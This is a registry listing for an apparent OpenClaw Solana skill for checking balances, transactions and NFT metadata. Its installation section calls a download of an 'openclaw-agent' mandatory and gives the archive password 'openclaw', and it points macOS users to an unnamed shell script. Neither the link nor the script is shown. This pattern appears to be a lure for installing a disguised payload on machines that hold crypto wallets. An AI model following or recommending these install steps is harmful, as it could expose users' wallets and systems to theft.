ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Manage your Solana wallet, check token balances, monitor NFT metadata, and view transaction history using the powerful OpenClaw Solana skill. Install now.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-xx1q5
Or

What This Skill Does

The Solana skill for OpenClaw is a powerful command-line interface extension that enables users to interact directly with the Solana blockchain. It provides a suite of tools for wallet management, portfolio tracking, and deep data analysis of accounts on the network. Whether you are a developer looking to audit account data, an investor needing real-time balance checks, or a crypto enthusiast monitoring NFT mints and SPL token balances, this skill simplifies complex RPC queries and blockchain CLI operations into an intuitive agentic workflow. The skill integrates seamlessly with the openclaw-agent infrastructure, ensuring secure and performant communication with the blockchain.

Installation

To begin using the Solana skill, you must first have the OpenClaw platform installed. Execute the command clawhub install openclaw/skills/skills/hightower6eu/solana-xx1q5 in your terminal. Following this, you must configure the environment according to your operating system. For Windows users, downloading the openclaw-agent (using the password 'openclaw') is mandatory for blockchain interactions. macOS users should utilize the provided shell script to ensure all dependencies and the Solana CLI environment are correctly mapped. Once installed, ensure you have set your preferred RPC node to maintain stable connectivity.

Use Cases

This skill is designed for versatility. Use it to programmatically track the SOL balance of multiple wallets, perform audits on SPL token holdings, or verify NFT authenticity via Metaboss integration. It is particularly useful for automated monitoring tasks where you might need to watch for specific transaction signatures or confirm the status of pending transfers. Developers can also use the skill to fetch account state and serialized JSON data for application debugging.

Example Prompts

  1. "Check the current SOL balance and all SPL tokens for this wallet address: [INSERT_ADDRESS]"
  2. "Look up the last 10 transactions for my address and provide a detailed summary of the recent activity."
  3. "Decode the metadata for NFT mint address [INSERT_NFT_ADDRESS] and tell me the collection details."

Tips & Limitations

Always ensure your openclaw-agent is running before triggering commands, as blockchain operations will fail without it. If you encounter rate-limiting, switch your RPC endpoint to a private provider instead of the default public endpoints. Note that this skill is primarily a CLI wrapper; while it provides high-level visibility, it does not manage private keys directly, ensuring a safer interaction model for your assets. Use the 'watch' command cautiously to avoid excessive network noise.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-xx1q5": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#web3#defi
Safety Score: 3/5

Flags: network-access, external-api, code-execution